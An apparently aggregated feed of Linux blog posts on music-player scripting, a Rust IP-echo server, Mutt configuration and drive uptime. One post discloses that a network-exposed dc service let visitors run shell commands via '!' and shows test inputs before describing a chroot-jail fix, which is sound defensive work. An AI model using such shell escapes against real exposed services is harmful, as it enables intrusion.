This small Go binary listens on the user DBUS for the media keys and issues mpd commands appropriately. If you didn’t want to use this then you could lash up something very simple that executes e.g. “mpc next” or “mpc toggle” when the relevant key is pressed, but this does it all for you. Once you’ve got it from GitHub, place the binary in $HOME/bin/, the mpd-mpris.service file from my GitHub at $HOME/.config/systemd/user/mpd-mpris.service and issue:

$ systemctl --user enable --now mpd-mpris

Assuming you have a running mpd and mpd client your media keys should now control it. Test that with gmpc or whatever.
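
If you’d rather write the unit file yourself than fetch mine, a minimal user unit along these lines should do the same job (a sketch based on the description above, assuming the binary is in $HOME/bin):

[Unit]
Description=mpd-mpris, bridging media keys (MPRIS) to mpd
After=mpd.service

[Service]
# %h expands to your home directory
ExecStart=%h/bin/mpd-mpris
Restart=on-failure

[Install]
WantedBy=default.target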

My scripts and supporting files

Just four files, and they are all in GitHub. Here’s what to do with them.

album_cover_poller.sh

Put it in $HOME/.ncmpcpp/. It shouldn’t need editing.

default_cover.jpg

Put it in $HOME/.ncmpcpp/. If you don’t like it, just substitute it with any other you like. When it comes time for timg to display it, it will scale it to fit inside the window whatever size it is on your desktop.

track_change.sh

Put it in $HOME/.ncmpcpp/. You’ll need to change candidate_name near the top if your album cover art files aren’t called cover.jpg.

viz.conf

Put it in $HOME/.ncmpcpp/. This is a cut-down example ncmpcpp config for the visualizer pane that removes a number of UI elements. It’s just for an ncmpcpp that starts on a visualizer view so feel free to customise it however you like your visualizer to be. You will need to change mpd_music_dir to match where your music is, like in your main ncmpcpp config.

The Main App

The main app displayed in the screenshot above is a kitty terminal with three windows. The leftmost 75% of the kitty terminal runs ncmpcpp defaulting to the playlist view. In the bottom right corner is a copy of ncmpcpp defaulting to the visualizer view and using the viz.conf. The top right corner is running a shell script that polls for album covert art and displays it in the terminal.

kitty is one of the newer crop of terminals that can display graphics. The timg program will detect kitty‘s graphics support and display a proper graphical image. In the absence of kitty‘s graphical protocol timg will fall back to sixel mode, which may be discernible but I wouldn’t personally want to use it.

I don’t actually use kitty as my day-to-day terminal. I use gnome-terminal and tmux. You can make a layout like this with gnome-terminal and tmux, or even kitty and tmux, but tmux doesn’t support kitty‘s graphical protocol so it would cause a fall back to sixel mode. So for this use and this use alone I use kitty and its built-in windowing support.

Album cover art for Good Vibrations: Thirty Years of The Beach Boys displayed in a kitty terminal using timg
The same cover art file displayed as sixels through tmux

If you don’t want to use kitty then pick whatever terminal you like and figure out how to put some different windows in it (tmux panes work fine, layout-wise). timg will probably fall back to sixels as even the venerable xterm supports that. But assuming you are willing to use kitty, you can start it like this:

$ kitty -o font_size=16 --session ~/.config/kitty/ncmpcpp.session

That kitty session file is in GitHub with everything else, and it’s what lays things out in the main terminal window. You should now be able to start playing music in ncmpcpp and have everything work.

How Stuff Works

You don’t need to know how it works, but in case you care I will explain a bit.

There are two bash shell scripts; album_cover_poller.sh and track_change.sh.

Album cover art

album_cover_poller.sh uses inotifywait from the inotify-tools package to watch a file in a cache directory. Any time that file changes, it uses timg to display it in the upper right window and queries mpd for the meta data of the currently-playing track.
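
Stripped of details, the loop is something like this (a simplified sketch with an assumed cache path, not the exact script from GitHub):

#!/bin/bash
# Redraw the cover art and current track info whenever the cached image changes.
cover="$HOME/.cache/ncmpcpp/cover.jpg"   # assumed location; see the real script

while true; do
    clear
    timg "$cover"      # uses kitty's graphics protocol when available
    mpc current        # one line of metadata for the playing track
    # Block until track_change.sh writes a new image, then loop and redraw
    inotifywait -qq -e close_write -e moved_to "$(dirname "$cover")"
done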

Track change tasks

track_change.sh is a bit more involved.

ncmpcpp is made to execute it when it changes track by adding this to your ncmpcpp configuration:

execute_on_song_change = "~/.ncmpcpp/track_change.sh -m /path/to/your/music/dir"

The /path/to/your/music/dir should be the same as what you have set your music library to in your MPD config. It defaults to $HOME/Music/ if not set.

First it asks mpd for a bunch of metadata about the currently-playing track. Using that it’s able to find the directory in the filesystem where the track file lives. It assumes that if album cover art is available then it will be in this directory and named cover.jpg. If it finds such a file then it copies it to the place where album_cover_poller.sh is expecting to find it. That will trigger that script’s inotifywait to display the new image. If it doesn’t find such a file then a default generic cover art image is used.

(A consequence of this is that it expects each directory in your music library to be for an album, with the cover.jpg being the album covert art. It intentionally doesn’t try to handle layouts like Artist/Track.ogg because it hasn’t got a way to know which file would be for that album. If you use some other layout I’d be interested in hearing about it. An obvious improvement would be to have it look inside each file’s metadata for art in the absence of a cover.jpg in the directory. That would be pretty easy, but it’s not relevant for my use at the moment.)

Secondly, a desktop notification is sent using notify-send. Most modern desktops including GNOME come with support for showing such notifications. Exactly how they look and the degree to which you can configure that depends upon your desktop environment. For GNOME, the answer is “like ass”, and “not at all without changing the notification daemon”, but that’s the case for every notification on the system so is a bit out of scope for this article.
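
The notification side needs nothing more exotic than a call like this (illustrative variable names, not the script’s exact ones):

notify-send -i "$cover" "Now playing" "$artist - $title"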

Other Useful Tools

I use a few other bits of software to help manage my music collection and play things nicely, that aren’t directly relevant to this.

Library maintenance

A good experience relies on there being correct metadata and files in the expected directory structure. It’s pretty common for music I buy to have junk metadata, and moving things into place would be tedious even when the metadata is correct. MusicBrainz Picard to the rescue!

It’s great at fixing metadata and then moving files en masse to my chosen directory structure. It can even be told for example that if the current track artist differs from the album artist then it should save the file out to “${album_artist}/${track_number}-${track_artist}-${track title}.mp3” so that a directory listing of a large “Various Artists” compilation album looks nice.

It also finds and saves album cover art for me.

It’s packaged in Debian.

I hear good things about beets, too, but have never tried it.

Album cover art

Picard is pretty good at finding album cover art but sometimes it can’t manage it, or it chooses sub-par images. I like the Python app sacad which tries really hard to find good quality album art and works on masses of directories at once.

Nicer desktop notifications

I really don’t like the default GNOME desktop notifications. On a 4K display they are tiny unless you crank up the general font size, in which case your entire desktop then looks like a toddler’s toy. Not only is their text tiny but they don’t hold much content either. When most track title notifications are ellipsized I start to wonder what the point is.

I replaced GNOME’s notification daemon with wired-notify, which is extremely configurable. I did have to clone it out of GitHub, install the rust toolchain and cargo build it, however.

My track change script that I talk about above will issue notifications that work on stock GNOME just as well as any other app’s notifications, but I prefer the wired-notify ones. Here’s an unscaled example.

A close up of a notification from track_change.sh
A close up of a notification from track_change.sh

It’s not a work of art by any means, but is so much better than the default experience. There’s a bunch of other people’s configs showcased on their GitHub.

Scrobbling

mpdscribble has got you covered for last.fm and Libre.fm. Again it is already packaged in Debian.

Shortcomings

If there’s any music files with tabs or newlines in any of their metadata, the scripts are going to blow up. I’m not sure of the best way to handle that one. mpc can’t format output NULL-separated like you’d do with GNU find. I’m not sure there is any character you can make it use in a format that is banned in metadata. I think worst case is simply messed up display and/or no cover art displayed, and I’d regard tabs and newlines in track metadata as a data error that I’d want to fix, so maybe I don’t care too much.

timg is supposed to scale and centre the image in the terminal, and the kitty window does resize to keep it at 25% width, 50% height, but timg is sometimes visibly a little off-centre. No ideas at the moment how to improve that.

mpd is a networked application — while by default it listens only on localhost, you can configure it to listen on any or all interfaces and be available over your local network or even the Internet. All of these scripts rely on your mpd client, in this case ncmpcpp, having direct access to the music library and its files, which is probably not going to be the case for a non-localhost mpd server. I can think of various tricky ways to handle this, but again it’s not relevant to my situation at present.

BitFolk Issue TrackerPanel - Feature #215 (New): Sort DNS domains alphabetically

The secondary DNS domains at https://panel.bitfolk.com/dns/ are currently ordered alphabetically, grouped by TLD. When there are many domains this is not completely obvious. It would perhaps be better to default to straight alpha order, or at the very least have that as an option.

Paul RaynerPrint (only) my public IP

Every now and then, I need to know my public IP. The easiest way to find it is to visit one of the sites which will display it for you, such as https://whatismyip.com. Whilst useful, all of the ones I know (including that one) are chock full of adverts, and can’t easily be scraped as part of any automated scripting.

This has been a minor irritation for years, so the other night I decided to fix it.

http://ip.pr0.uk is my answer. It’s 50 lines of Rust, accessible via TCP on port 11111 and via HTTP on port 8080.
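
For example (the address shown is a placeholder from the documentation range, not a real result):

$ nc ip.pr0.uk 11111
203.0.113.7
$ curl -s http://ip.pr0.uk:8080
<html><head><title>203.0.113.7</title></head><body><h1>203.0.113.7</h1></body></html>

Here’s the source: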

use std::io::Write;

use std::net::{IpAddr, Ipv4Addr, Ipv6Addr, SocketAddr, TcpListener, TcpStream};
use chrono::Utc;
use threadpool::ThreadPool;

fn main() {
    let worker_count = 4;
    let pool = ThreadPool::new(worker_count);
    let tcp_port = 11111;
    let socket_v4_tcp = SocketAddr::new(IpAddr::V4(Ipv4Addr::new(0, 0, 0, 0)), tcp_port);

    let http_port = 8080;
    let socket_v4_http = SocketAddr::new(IpAddr::V4(Ipv4Addr::new(0, 0, 0, 0)), http_port);

    let socket_addrs = vec![socket_v4_tcp, socket_v4_http];
    let listener = TcpListener::bind(&socket_addrs[..]);
    if let Ok(listener) = listener {
        println!("Listening on {}:{}", listener.local_addr().unwrap().ip(), listener.local_addr().unwrap().port());
        for stream in listener.incoming() {
            let stream = stream.unwrap();
            let addr = stream.peer_addr().unwrap().ip().to_string();
            if stream.local_addr().unwrap_or(socket_v4_http).port() == tcp_port {
                pool.execute(move||send_tcp_response(stream, addr));
            } else {
                //http might be proxied via https so let anything which is not the tcp port be http
                pool.execute(move||send_http_response(stream, addr));
            }
        }
    } else {
        println!("Unable to bind to port")
    }
}

fn send_tcp_response(mut stream:TcpStream, addr:String) {
    stream.write_all(addr.as_bytes()).unwrap();
}

fn send_http_response(mut stream:TcpStream, addr:String) {

    let html = format!("<html><head><title>{}</title></head><body><h1>{}</h1></body></html>", addr, addr);
    let length = html.len();
    let response = format!("HTTP/1.1 200 OK\r\nContent-Length: {length}\r\n\r\n{html}" );
    stream.write_all(response.as_bytes()).unwrap();
    println!("{}\tHTTP\t{}",Utc::now().to_rfc2822(),addr)
}

A little explanation is needed on the array of SocketAddr. This came from an initial misreading of the docs, but I liked the result and decided to keep it that way. Binding to a slice of addresses will only listen on one port - the first one in the array which is free. The result is that when you run this program, it listens on port 11111. If you keep it running and start another copy, that one listens on port 8080 (because it can’t bind to port 11111). So to run this on my server, I just have systemd keep 2 copies alive at any time.

The code and binaries for Linux and Windows are available on Github.

Next steps

I might well leave it there. It works for me, so it’s done. Here are some things I could do though:

  1. Don’t hard code the ports
  2. Proxy https
  3. Make a client
  4. Make it available as a binary for anyone to run on crates.io
  5. Optionally print the ttl. This would be mostly useful to people running their own instance.

Boring Details

Logging

I log the IP, port, and time of each connection. This is just in case it ever gets flooded and I need to block an IP/range. The code you see above is the code I run. No browser detection, user agent or anything like that is read or logged. Any data you send with the connection is discarded. If I proxied https via nginx, that might log a bit of extra data as a side effect.

Systemd setup

There’s not much to this either. I have a template file:

[Unit]
Description=Run the whatip binary. Instance %i
After=network.target

[Service]
ExecStart=/path/to/whatip
Restart=on-failure

StandardOutput=syslog
StandardError=syslog
SyslogIdentifier=whatip%i

[Install]
WantedBy=multi-user.target

stored at /etc/systemd/system/whatip@.service and then set up two instances to run:

systemctl enable whatip@1
systemctl enable whatip@2

Thanks for reading

David Leadbeater"[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

A paper detailing how unescaped output to a terminal could result in unexpected code execution, on many terminal emulators. This research found around 10 CVEs in terminal emulators across common client platforms.

Alun JonesMessing with web spiders

You've surely heard of ChatGPT and its ilk. These are massive neural networks trained using vast swathes of text. The idea is that if you've trained a network on enough… (about 467 words)

Andy SmithMutt wins again – subject munging on display

TL;DR:

You can munge subjects for display only using the subjectrx Mutt configuration directive.

The Setup

I use the terminal-based email reader Mutt.

Many projects that I follow are switching away from email discussion lists in favour of web-first interfaces (“forums”, I think the youngsters are calling them now) like Discourse. That is fine—there’s lots of problems with trying to run a busy community over email—but Discourse offers a “mailing list mode” and I still find my Mutt email client to be a comfortable way to follow discussions. So all my accounts on the various Discourse instances are set to mailing list mode.

The Problem

One of the slight issues I have with this is the subject lines that Discourse uses. On an instance with a lot of categories and sub-categories, these will all be prepended to the subject line of each email, using up quite a lot of screen space.

The same is true for legacy mailing list subject tags, but in that environment the admins were generally conscious that whatever text they chose would be prepended to every subject, so they tend to choose terse tags like “[users]” for example.

There was a time when subject line tags were controversial amongst experienced email users, because experienced email users know how to sort and filter their mails based on headers and don’t need a tag in the subject line to let them know what an email is. It doesn’t seem to be very controversial any more; I hypothesise that’s because new Internet users don’t use email as much and so don’t value spending much time working out how to get their filtering just right, and so on. So, most legacy mailing lists that I’m part of now do use terse subject tags and not many people complain about that.

Since the posts on Discourse are primarily intended for a web browser, the verbosity of the categories is not an issue. It’s not uncommon to see a category called, say, “Help & Support” and then within that a sub-category for a particular project, e.g. “Footronic 5.x”. When Discourse sends out an email for a post to such a category, it’ll look like this:

Subject: [Help & Support] [Footronic 5.x] Need some help getting my Foo into alignment after passing through a bar-quux transform

Lots of space is used by that prefix, on every message, and pointlessly so for me: these mails will have been filtered into a folder, so I always know which folder I’m looking at, and all of the messages in it will be for help and support on Footronic 5.x. Like most email clients, Mutt has an index view that shows an overview of all the emails with a single line for each. Long subjects are truncated at the edge of my terminal.

I’ve put up with this for years, but the last straw was the newly-launched Ansible forum. Their category names are long and there are lots of sub-categories. Here’s an example of what that looks like in my 95-character-wide terminal.

The index view of a Mutt email client

This is quite irritating! I wondered if it could be fixed.

The Fix

Of course the Mutt community thought of this, and years ago. subjectrx! You put it in your config, specifying a regular expression to match and what it should be replaced with. For example:

subjectrx '\[Ansible\] \[[^]]*\] *' '%L%R'

That matches any sequence of “[Ansible] ” followed by another set of “[]” that have anything inside them, and replaces all of that with the left side of the match (%L) and the right side of the match (%R). So that effectively discards the tags.
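If you’d rather keep a hint that tags were stripped, the replacement can include literal text between the two sides of the match. A hypothetical variant:

subjectrx '\[Ansible\] \[[^]]*\] *' '%L[A] %R'

would collapse the whole prefix to a terse “[A] ” instead of removing it entirely.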

This happens only on display; it doesn’t modify the actual emails on storage.

Here’s what that looks like afterwards:

The index view of a Mutt email client, with tags removed from subject lines

Much better, right?

And that’s one of the reasons why I continue to use Mutt.

Other Solutions

Off the top of my head, there are some other ways this could have been done.

Alter emails upon delivery

It would have been pretty simple to strip these tags out of emails as they were being delivered, but I really like to keep emails on storage the same as they were when they arrived. At the very least, doing this would cause a DKIM failure, as I would have modified the message after it was signed. That wouldn’t be an issue for my delivery, since my DKIM check happens before any such editing, but I’d still rather not.

Run the subject lines through an external filter program

The format of many things in Mutt is highly configurable and one such format is index_format, which controls how the lines on the index view are displayed.

Sadly there is not a builtin format specifier to search and replace in the subject tag (or any other tag), but you can run the whole thing through an external program, which could do anything you liked to it. That would involve fork()ing and exec()ing a process for every single mail in a mailbox though. Yuck.

On Discourse

This is not a gripe about Discourse. I think Discourse is a better way to run a busy community than email lists. At this point I’d be happy for most mailing lists I’m part of to switch to Discourse instances, especially the very busy ones. I’m impressed with the amount of work and features that Discourse now has.

The only exception to that I think is that purely question-answer support mailing lists might be better off with a StackOverflow-style approach like AskUbuntu. But failing that, I think Discourse is still many times better than a mailing list for that use case.

Not that you asked, but I think the primary problem with email as a community platform is that only old people use email. In the 21st century it’s an unacceptable barrier to entry.

The next most serious problem with email for running a community is that any decently-sized community will have a certain percentage of utter numpties; these utter numpties won’t be self-aware enough to know they are utter numpties, and they will post a lot of nonsense. The only way to counter a numpty posting nonsense is to reply to it and call them out. That is exhausting, unrewarding work, which frequently goes wrong, adding to the noise and ill-feeling. Problem posters do not get dealt with until they reach a level bad enough to warrant their posting rights being removed. Forums like Discourse scale their moderation tasks much better, with a lot of it being amenable to wide community input.

I could go on to list a lot more serious problems but those two are the worst in my opinion.

BitFolk Issue TrackerPanel - Bug #214 (New): List of referrals includes closed accounts in the total

At the bottom of the customer's list of referrals is the line "That's about £xx.xx per year!" The "£xx.xx" is a total of all their referrals ever, even if those referrals are no longer active. It only makes sense to add up active referrals, while still showing all referrals.

Andy SmithHappy birthday, /dev/sdd?

One of my hard drives reaches 120,000 hours of operation in about a month:

$ ~/src/blkleaderboard/blkleaderboard.sh
     sdd 119195 hours (13.59 years) 0.29TiB ST3320620AS
     sdb 114560 hours (13.06 years) 0.29TiB ST3320620AS
     sda 113030 hours (12.89 years) 0.29TiB ST3320620AS
     sdk  76904 hours ( 8.77 years) 2.73TiB WDC WD30EZRX-00D
     sdh  66018 hours ( 7.53 years) 0.91TiB Hitachi HUA72201
     sde  45746 hours ( 5.21 years) 0.91TiB SanDisk SDSSDH31
     sdc  39179 hours ( 4.46 years) 0.29TiB ST3320418AS
     sdf  28758 hours ( 3.28 years) 1.82TiB Samsung SSD 860
     sdj  28637 hours ( 3.26 years) 1.75TiB KINGSTON SUV5001
     sdg  23067 hours ( 2.63 years) 1.75TiB KINGSTON SUV5001
     sdi   9596 hours ( 1.09 years) 0.45TiB ST500DM002-1BD14

It’s a 320GB Seagate Barracuda 7200.10.
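If you want to check a single drive’s total yourself, it can be read straight from SMART attribute 9 (Power_On_Hours) with smartmontools; the raw value is the tenth column of smartctl’s attribute table:

$ sudo smartctl -A /dev/sdd | awk '/Power_On_Hours/ {print $10}'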

The machine these are in is a fileserver at my home. The four 320GB HDDs are what the operating system is installed on, whereas the hodgepodge assortment of differently-sized HDDs and SSDs is the main storage for files.

That is not the most performant way to do things, but it’s only at home and doesn’t need best performance. It mostly just uses up discarded storage from other machines as they get replaced.

sdd has seen every release of Debian since 4.0 (etch) and several iterations of hardware, but this can’t go on much longer. The machine that the four 320GB HDDs are in now is very underpowered but any replacement I can think of won’t be needing four 3.5″ SATA devices inside it. More like 2x 2.5″ NVMe or M.2.

Then again, I’ve been saying that it must be replaced for about 5 years now, so who knows how long it will take me. Barring hardware failure, sdd will definitely reach 120,000 hours in the next month.

blkleaderboard.sh is on GitHub, by the way.

Alun JonesI wrote a static site generator

Back in 2019, when Google+ was shut down, I decided to start writing this blog. It seemed better to take my ramblings under my own control, rather than posting content - about 716 words

Alun JonesSolar panels

After an 8 month wait, we finally had solar panels installed at the start of July. We originally ordered, from e-on, last November, and were told that there was a - about 542 words

Alun JonesVirtual WiFi

At work I've been developing a system which runs on an embedded Linux machine and provides a service via a "captive" WiFi access point. Much of my dev work on - about 243 words

BitFolk Issue TrackerMisc infrastructure - Feature #212: Publish a DKIM record for bitfolk.com and sign emails with it

Aggregate reports show that the Icinga host is sending mail as without DKIM signature, though SPF is already covered.
DKIM signatures added for this now.

BitFolk Issue TrackerMisc infrastructure - Feature #212: Publish a DKIM record for bitfolk.com and sign emails with it

Amusingly this redmine VM sends email as so that will need to be fixed. See issue #213

BitFolk Issue TrackerMisc infrastructure - Feature #213 (New): Make redmine host send email through main mail relay

This VM (redmine) sends email as which will need to be DKIM-signed. Probably the easiest way to do this is have it route such mails through the main outbound mail relay instead of trying to deliver them directly.

Alex HudsonJobs in the AI Future

Everyone is talking about what AI can do right now, and the impact that it is likely to have on us. This weekend’s Semafor Flagship (which is an excellent newsletter; I recommend subscribing!) asks a great question: “What do we teach the AI generation?”. As someone who grew up with computers, knowing he wanted to write software, and knowing that tech was a growth area, I never had to grapple with this type of worry personally. But I do have kids now. And I do worry. I’m genuinely unsure what I would recommend a teenager to do today, right now. But here’s my current thinking.

Alun JonesMy new sensor network

If you've been following (and why should you?) you'll know I've spent years mucking around with cheap 433MHz radios to build a sensor network. When I started out with this, - about 571 words

Paul RudkinYour new post

Your new post

This is a new blog post. You can author it in Markdown, which is awesome.

David LeadbeaterNAT-Again: IRC NAT helper flaws

A Linux kernel bug allows unencrypted NAT'd IRC sessions to be abused to access resources behind NAT, or drop connections. Switch to TLS right now. Or read on.

David Leadbeaterip.wtf and showing you your actual HTTP request

Using haproxy in strange ways

Paul RaynerPutting dc in (chroot) jail

A little over 4 years ago, I set up a VM and configured it to offer dc over a network connection using xinetd. I set it up at http://dc.pr0.uk and made it available via a socket connection on port 1312.

Yesterday morning I woke to read a nice email from Sylvan Butler pointing out that users could run shell commands from dc…

I had set up the dc command to run as a user “dc”, but still, if someone could run a shell command they could, for example, put a key in the dc user’s .ssh config, run sendmail (if it was set up), or try for privilege escalation to get root, etc.

I’m not sure what the 2017 version of me was thinking (or wasn’t), but the 2022 version of me is not happy to leave it like this. So here’s how I put dc in jail.

Firstly, how do you run shell commands from dc? It’s very easy. Just prefix with a bang:

$ dc
!echo "I was here" > /tmp/foo
!cat /tmp/foo
I was here

So, really easy. Even if it was hard, it would still be bad.

This needed to be fixed. Firstly I thought about what else was on the VM - nothing that matters. This is a good thing, because the helpful Sylvan might not have been the first person to spot the issue (although network dc is pretty niche). I still don’t want this vulnerability though, as someone else getting access to this box could still use it to send spam, host malware or do anything else they wanted with a cheap, tiny VM.

I looked at restricting the dc user further (it had no login shell, and no home directory already), but it felt like I would always be missing something, so I turned to chroot jails.

A chroot jail lets you run a command, specifying a directory which is used as / for that command. The command (in theory) can’t escape that directory, so can’t see or touch anything outside it. Chroot is a kernel feature, and forms a basic security feature of Linux, so should be good enough to protect network dc if set up correctly, even if it’s not perfect.
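As a sketch of the mechanics (using the jail directory set up below):

$ sudo chroot /home/dc ./dc --version

Here /home/dc becomes / for the dc process, which can then only see files underneath it.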

Firstly, let’s set up the directory for the jail. We need the programs to run inside the jail, and their dependent libraries. The script to run a networked dc instance looks like this:

#!/bin/bash
dc --version
sed -u -e 's/\r/\n/g' | dc

Firstly, I’ve used bash here, but this script is trivial, so it can use sh instead. We also need to keep the sed (I’m sure there are plenty of ways to do the replace without sed, but it’s working fine as it is). For each of the three programs needed to run the script, I ran ldd to get its dependencies:

$ ldd /usr/bin/dc
	linux-vdso.so.1 =>  (0x00007fffc85d1000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc816f8d000)
	/lib64/ld-linux-x86-64.so.2 (0x0000555cd93c8000)
$ ldd /bin/sh
	linux-vdso.so.1 =>  (0x00007ffdd80e0000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa3c4855000)
	/lib64/ld-linux-x86-64.so.2 (0x0000556443a1e000)
$ ldd /bin/sed
	linux-vdso.so.1 =>  (0x00007ffd7d38e000)
	libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007faf5337f000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007faf52fb8000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007faf52d45000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007faf52b41000)
	/lib64/ld-linux-x86-64.so.2 (0x0000562e5eabc000)
	libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007faf52923000)
$
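Copying each binary and its libraries into place by hand is fiddly, so a loop along these lines (a sketch that scrapes the paths out of the ldd output above) can do it instead:

#!/bin/bash
# copy each binary to the jail root, and each library ldd reports
# into the same directory structure inside the jail
JAIL=/home/dc
for bin in /usr/bin/dc /bin/sh /bin/sed; do
    cp "$bin" "$JAIL/"
    for lib in $(ldd "$bin" | grep -o '/[^ ]*'); do
        mkdir -p "$JAIL$(dirname "$lib")"
        cp "$lib" "$JAIL$(dirname "$lib")/"
    done
done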

So we copy those files to the exact directory structure inside the jail directory. Afterwards it looks like this:

$ ls -alR
.:
total 292
drwxr-xr-x 4 root root   4096 Feb  5 10:13 .
drwxr-xr-x 4 root root   4096 Feb  5 09:42 ..
-rwxr-xr-x 1 root root  47200 Feb  5 09:50 dc
-rwxr-xr-x 1 root root     72 Feb  5 10:13 dctelnet
drwxr-xr-x 3 root root   4096 Feb  5 09:49 lib
drwxr-xr-x 2 root root   4096 Feb  5 09:50 lib64
-rwxr-xr-x 1 root root  72504 Feb  5 09:58 sed
-rwxr-xr-x 1 root root 154072 Feb  5 10:06 sh

./lib:
total 12
drwxr-xr-x 3 root root 4096 Feb  5 09:49 .
drwxr-xr-x 4 root root 4096 Feb  5 10:13 ..
drwxr-xr-x 2 root root 4096 Feb  5 10:01 x86_64-linux-gnu

./lib/x86_64-linux-gnu:
total 2584
drwxr-xr-x 2 root root    4096 Feb  5 10:01 .
drwxr-xr-x 3 root root    4096 Feb  5 09:49 ..
-rwxr-xr-x 1 root root 1856752 Feb  5 09:49 libc.so.6
-rw-r--r-- 1 root root   14608 Feb  5 10:00 libdl.so.2
-rw-r--r-- 1 root root  468920 Feb  5 10:00 libpcre.so.3
-rwxr-xr-x 1 root root  142400 Feb  5 10:01 libpthread.so.0
-rw-r--r-- 1 root root  146672 Feb  5 09:59 libselinux.so.1

./lib64:
total 168
drwxr-xr-x 2 root root   4096 Feb  5 09:50 .
drwxr-xr-x 4 root root   4096 Feb  5 10:13 ..
-rwxr-xr-x 1 root root 162608 Feb  5 10:01 ld-linux-x86-64.so.2
$

and here is the modified dctelnet command:

#!/sh
# note: sh, sed and dc all sit at the jail root, so paths are relative to /
#dc | dos2unix 2>&1
./dc --version
./sed -u -e 's/\r/\n/g' | ./dc

I’ve switched to using sh instead of bash, and all of the commands are now relative paths, as they are just in the root directory.

First attempt

Now I have a directory that I can use for a chrooted network dc. I need to set up the xinetd config to use chroot and the jail I have set up:

service dc
{
	disable		= no
	type		= UNLISTED
	id		= dc-stream
	socket_type	= stream
	protocol	= tcp
	server		= /usr/sbin/chroot
	server_args	= /home/dc/ ./dctelnet
	user		= root
	wait		= no
	port		= 1312
	rlimit_cpu	= 60
	env		= HOME=/ PATH=/
}

I needed to set the HOME and PATH environment variables, otherwise I got a segfault (I’m not sure whether it was sh, sed or dc causing it). And to run chroot, you need to be root, so I could no longer run the service as the user dc. This shouldn’t be a problem because the resulting process is constrained.

A bit more security

Chroot jails have a reputation for being easy to get wrong, and they are not something I have done a lot of work with, so I want to take a bit of time to think about whether I’ve left any glaring holes, and also try to improve on the simple option above a bit if I can.

Firstly, can dc still execute commands with the ! operation?

 ~> nc -v dc.pr0.uk 1312
Connection to dc.pr0.uk 1312 port [tcp/*] succeeded!
dc (GNU bc 1.06.95) 1.3.95

Copyright 1994, 1997, 1998, 2000, 2001, 2004, 2005, 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE,
to the extent permitted by law.
!ls
^C⏎

Nope. Ok, that’s good. The chroot jail has sh though, and has it in the PATH, so can it still get a shell and call dc, sh and sed?

 ~> nc -v dc.pr0.uk 1312
Connection to dc.pr0.uk 1312 port [tcp/*] succeeded!
dc (GNU bc 1.06.95) 1.3.95

Copyright 1994, 1997, 1998, 2000, 2001, 2004, 2005, 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE,
to the extent permitted by law.
!pwd
^C⏎

pwd is a builtin, so it looks like the answer is no, but why? Running strings on my version of dc, there is no mention of sh or exec, but there is a mention of system. From the man page of system:

The system() library function uses fork(2) to create a child process that executes the shell  command  specified in command using execl(3) as follows:

           execl("/bin/sh", "sh", "-c", command, (char *) 0);

So dc calls system() when you use !, which makes sense. system() calls /bin/sh, which does not exist in the jail, breaking the ! call.

For a system that I don’t care about, that is of little value to anyone else, and that sees very little traffic, that’s probably good enough. But I want to make it a bit better: if there were a problem with the dc program, or you could get it to pass something to sed and trigger an issue with that, you could mess with the jail file system, overwrite the dc application, and likely break out of jail, as the whole thing is running as root.

So I want to do two things. Firstly, I don’t want dc running as root in the jail. Secondly, I want to throw away the environment after each use, so if you figure out how to mess with it you don’t affect anyone else’s fun.

Here’s a bash script which I think does both of these things:

#!/bin/bash
set -e
DCDIR="$(mktemp -d /tmp/dc_XXXX)"
trap '/bin/rm -rf -- "$DCDIR"' EXIT
cp -R /home/dc/ $DCDIR/
cd $DCDIR/dc
PATH=/
HOME=/
export PATH
export HOME
/usr/sbin/chroot --userspec=1001:1001 . ./dctelnet
  • Line 2 - set -e causes the script to exit on the first error.
  • Lines 3 & 4 - make a temporary directory to run in, then set a trap to clean it up when the script exits.
  • I then copy the required files for the jail to the new temp directory, set $HOME and $PATH, and run the jail as an unprivileged user (uid 1001).

Now to make some changes to the xinetd file:

service dc
{
        disable         = no
        type            = UNLISTED
        id              = dc-stream
        socket_type     = stream
        protocol        = tcp
        server          = /usr/local/bin/dcinjail
        user            = root
        wait            = no
        port            = 1312
        rlimit_cpu      = 60
        log_type        = FILE /var/log/dctelnet.log
        log_on_success  = HOST PID DURATION
        log_on_failure  = HOST
}

The new version just runs the script from above. It still needs to run as root to be able to chroot.

I’ve also added some logging as this has piqued my interest and I want to see how many people (other than me) ever connect, and for how long.

As always, I’m interested in feedback or questions. I’m no expert in this setup so may not be able to answer questions, but if you see something that looks wrong (or that you know is wrong), please let me know. I’m also interested to hear about other ways of doing process isolation - I know I could have used containers, and think I could have used systemd or SELinux features (or both) to further lock down the dc user and achieve a similar result.

Thanks for reading.

Christopher RobertsFixing SVG Files in DokuWiki

Having upgraded a DokuWiki server from Ubuntu 16.04 to 18.04, I found that SVG images were no longer displaying in the browser. As I was unable to find any applicable answers on-line, I thought I should break my radio silence by detailing my solution.

Inspecting the file using the browser’s Network tools while refreshing the page showed that the file was being downloaded as application/octet-stream. Sure enough, using curl showed the same.

curl -Ik https://example.com/file.svg

All the advice on-line is to ensure that /etc/nginx/mime-types includes the line:

image/svg+xml   svg svgz;

But that was already in place.

I decided to try uploading the SVG file again, in case the Inkscape format was causing breakage. Yes, a long-shot indeed.

The upload was rejected by DokuWiki, as SVG was not in the list of allowed file extensions; so I added the following line to /var/www/dokuwiki/conf/mime.local.conf:

svg   image/svg+xml

Whereupon the images started working again. Presumably DokuWiki was seeing the mime-type as image/svg instead of image/svg+xml, and this mismatch was preventing nginx serving up the correct content-type.
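A quick way to confirm the fix is to repeat the earlier curl check and look at the content type:

# should now report image/svg+xml rather than application/octet-stream
$ curl -Ik https://example.com/file.svg | grep -i '^content-type'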

Hopefully this will help others, do let me know if it has helped you.

Paul RaynerSnakes and Ladders, Estimation and Stats (or 'Sometimes It Takes Ages')

Snakes And Ladders

